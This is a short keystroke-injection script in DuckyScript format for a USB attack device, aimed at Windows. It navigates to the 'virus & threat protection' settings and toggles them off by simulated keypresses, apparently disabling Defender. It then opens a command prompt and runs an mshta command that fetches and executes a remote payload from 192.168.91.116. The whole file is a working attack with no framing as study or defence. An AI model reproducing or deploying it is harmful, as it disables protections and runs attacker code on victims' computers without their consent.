
REM ---------VIRUS & THREAT PROTECTION
DELAY 100
CTRL ESC 
DELAY 100 
STRING virus & threat protection
DELAY 100
ENTER
DELAY 700
TAB
TAB
TAB
TAB
DELAY 1000
ENTER
DELAY 1000
SHIFT SPACE
DELAY 1000
LEFT
SHIFT SPACE
DELAY 1000
TAB
SHIFT SPACE
DELAY 200
TAB
SHIFT SPACE
DELAY 100	  
TAB
TAB
SHIFT SPACE
DELAY 100
ALT F4

REM -----------CMD

DELAY 100
CTRL ESC
DELAY 200
STRING command prompt
DELAY 200
RIGHT
DOWN
DELAY 300
LEFT
SHIFT SPACE
ENTER
DELAY 300
STRING mshta http://192.168.91.116:80/825YJ
DELAY 200
ENTER
DELAY 500
ALT TAB
DELAY 200
ALT TAB
DELAY 200
STRING exit
DELAY 100
ENTER


